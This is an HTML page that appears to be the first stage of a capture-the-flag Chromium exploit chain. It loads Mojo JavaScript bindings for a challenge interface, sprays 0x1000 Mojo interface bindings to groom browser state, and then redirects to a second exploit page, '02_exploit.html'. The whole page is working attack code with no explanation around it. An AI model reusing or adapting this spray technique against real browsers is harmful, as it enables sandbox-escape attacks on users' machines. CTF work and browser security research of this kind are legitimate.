<!DOCTYPE html>
<html>
    <head>
        <title>yoshiking</title>
        <script src="ctf-challenge/mojojs/mojo_bindings.js"></script>
        <script src="ctf-challenge/mojojs/gen/third_party/blink/public/mojom/desert.mojom.js"></script>
    </head>
    <body>
        <script>
         console.log("[+] Nyan nyan");
         /* Spray port name */
         for (let i = 0; i < 0x1000; i++) {
             let p = new blink.mojom.OzymandiasPtr();
             Mojo.bindInterface(blink.mojom.Ozymandias.name,
                                mojo.makeRequest(p).handle, 'context', true);
         }
         console.log("[+] Uho uho");
         window.location.href = "/02_exploit.html"
        </script>
    </body>
</html>
